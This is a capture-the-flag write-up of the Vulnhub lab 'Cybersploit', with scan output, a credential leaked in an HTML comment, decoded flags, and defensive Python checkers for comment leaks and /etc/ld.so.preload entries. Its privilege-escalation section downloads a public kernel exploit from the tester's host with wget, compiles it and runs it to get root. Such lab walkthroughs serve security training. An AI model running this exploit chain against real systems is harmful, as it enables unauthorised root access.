[VLN] Cybersploit

Today we are going to hack the Vulnhub machine called Cybersploit. You can download it from the following link: Cybersploit

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.78
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 16:25 CEST
Nmap scan report for cybersploit-CTF.home (192.168.1.78)
Host is up (0.00075s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds

We visit http://192.168.1.78/ to see whether the site contains anything interesting. Looking at the page source, we can see a comment at the end:

username:itsskv

On the other hand, if we visit robots.txt at http://192.168.1.78/robots.txt, we find:

R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9

If we base64-decode it we get:

~ > echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}%

We log in with the credentials: itsskv/cybersploit{youtube.com/c/cybersploit}
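
As an added example (not part of the original write-up): both leaks found during enumeration, a credential in an HTML comment and an encoded line in robots.txt, can be caught before a site is deployed. The sketch below flags them; the function names, the regexes and the sample page around the comment are assumptions made for illustration.

```python
import base64
import re
from html.parser import HTMLParser

# Field names a crawler understands; any other robots.txt line is reported.
ROBOTS_FIELDS = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay"}
CRED_RE = re.compile(r"\b(user(name)?|login|pass(word|wd)?)\s*[:=]\s*\S+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Constructed samples: only the comment text and the encoded line are from the page.
SAMPLE_HTML = "<html><title>Hello Pentester!</title></html>\n<!-- username:itsskv -->"
SAMPLE_ROBOTS = ("User-agent: *\nDisallow: /private/\n"
                 "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0"
                 "e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9\n")


class CommentCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def audit_html(html):
    """Return the HTML comments that look like they carry a credential."""
    parser = CommentCollector()
    parser.feed(html)
    return [c for c in parser.comments if CRED_RE.search(c)]


def audit_robots(text):
    """Return (line, decoded_or_None) for lines that are not robots directives."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.partition(":")[0].strip().lower() in ROBOTS_FIELDS:
            continue
        decoded = None
        if B64_RE.fullmatch(line):
            try:
                decoded = base64.b64decode(line, validate=True).decode("utf-8")
            except ValueError:
                pass  # not valid base64, or not text once decoded
        findings.append((line, decoded))
    return findings


if __name__ == "__main__":
    print(audit_html(SAMPLE_HTML), audit_robots(SAMPLE_ROBOTS))
```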

Low Shell



~ > ssh itsskv@192.168.1.132
The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
itsskv@192.168.1.132's password: 
Permission denied, please try again.
itsskv@192.168.1.132's password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

332 packages can be updated.
273 updates are security updates.

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$

We take a look at itsskv's home directory.

itsskv@cybersploit-CTF:~$ ls -la
total 156
drwxr-xr-x 20 itsskv itsskv  4096 Jun 27 10:00 .
drwxr-xr-x  4 root   root    4096 Jun 25 12:11 ..
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Desktop
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Documents
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Downloads
-rw-r--r--  1 itsskv itsskv  8445 Jun 25 12:11 examples.desktop
-rw-rw-r--  1 itsskv itsskv   495 Jun 27 10:03 flag2.txt
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Music
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Pictures
-rw-r--r--  1 itsskv itsskv   675 Jun 25 12:11 .profile
drwxr-xr-x  2 itsskv itsskv  4096 Jun 25 19:04 Videos

We can see that there is a file called flag2.txt. Let's take a look at it.

itsskv@cybersploit-CTF:~$ cat flag2.txt 
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 
01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 
00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 
01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 
01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 
01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 
01110000 01101100 01101111 01101001 01110100 00110001 01111101

The content is "binary" code. We go to the following website to convert it to ASCII: https://www.rapidtables.com/convert/number/binary-to-ascii.html

The result is:

good work !
flag2: cybersploit{https:t.me/cybersploit1}

We keep looking around the system and see that it is running an old kernel.

Privilege Escalation



itsskv@cybersploit-CTF:~$ uname -a
Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

Searching exploit-db, we find the following exploit[1]. We download it to our machine and transfer it to the "victim" machine.

itsskv@cybersploit-CTF:/tmp$ wget http://192.168.1.111/37292.c
--2020-07-13 16:17:17--  http://192.168.1.111/37292.c
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [application/octet-stream]
Saving to: `37292.c'

100%[=====================================================>] 5,119       --.-K/s   in 0s      

2020-07-13 16:17:17 (549 MB/s) - `37292.c' saved [5119/5119]

Once downloaded, we compile it, give it execute permissions and finally run it.

itsskv@cybersploit-CTF:/tmp$ gcc -o 3 37292.c 
itsskv@cybersploit-CTF:/tmp$ chmod +x 3
itsskv@cybersploit-CTF:/tmp$ ./3
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
#
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)

We get root :)
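
The exploit output above reports that /etc/ld.so.preload was created. As an added example (not part of the original write-up or of the exploit), this check reports every entry in that file, which is absent on most systems, and why it deserves review; the function names and the example-lib.so path are constructed for illustration.

```python
import os
import re
import stat
import tempfile

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable staging areas


def audit_preload(root="/"):
    """Return {library: [reasons]} for every entry in <root>/etc/ld.so.preload."""
    try:
        with open(os.path.join(root, "etc/ld.so.preload"), errors="replace") as fh:
            lines = fh.read().splitlines()
    except FileNotFoundError:
        return {}  # usual state: nothing is preloaded system-wide
    report = {}
    for line in lines:
        # '#' starts a comment; entries are split on whitespace and colons
        for lib in filter(None, re.split(r"[\s:]+", line.split("#", 1)[0])):
            reasons = ["preloaded into every dynamically linked process"]
            if lib.startswith(TEMP_DIRS):
                reasons.append("library lives in a temp directory")
            try:
                st = os.stat(os.path.join(root, lib.lstrip("/")))
            except OSError:
                reasons.append("library file is missing")
            else:
                if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                    reasons.append("writable by group or others")
                if st.st_uid != 0:
                    reasons.append("not owned by root")
            report[lib] = reasons
    return report


def demo():
    """Build a constructed root tree with a planted preload entry and audit it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "tmp"))
        lib = os.path.join(root, "tmp/example-lib.so")  # constructed name
        open(lib, "wb").close()
        os.chmod(lib, 0o666)
        with open(os.path.join(root, "etc/ld.so.preload"), "w") as fh:
            fh.write("# constructed sample\n/tmp/example-lib.so\n")
        return audit_preload(root)


if __name__ == "__main__":
    for lib, reasons in demo().items():
        print(lib, "->", "; ".join(reasons))
```

On a live host, call audit_preload() with the default root and treat any non-empty result as something to explain.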

finalflag.txt



# cd /root
# ls
finalflag.txt
# cat finalflag.txt
  ______ ____    ____ .______    _______ .______          _______..______    __        ______    __  .___________.
 /      |\   \  /   / |   _  \  |   ____||   _  \        /       ||   _  \  |  |      /  __  \  |  | |           |
|  ,----' \   \/   /  |  |_)  | |  |__   |  |_)  |      |   (----`|  |_)  | |  |     |  |  |  | |  | `---|  |----`
|  |       \_    _/   |   _  <  |   __|  |      /        \   \    |   ___/  |  |     |  |  |  | |  |     |  |     
|  `----.    |  |     |  |_)  | |  |____ |  |\  \----.----)   |   |  |      |  `----.|  `--'  | |  |     |  |     
 \______|    |__|     |______/  |_______|| _| `._____|_______/    | _|      |_______| \______/  |__|     |__|     

   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ 
 ( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ 

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.
Thanks !

End


And with this we would be root on the machine :)

[1] https://www.exploit-db.com/exploits/37292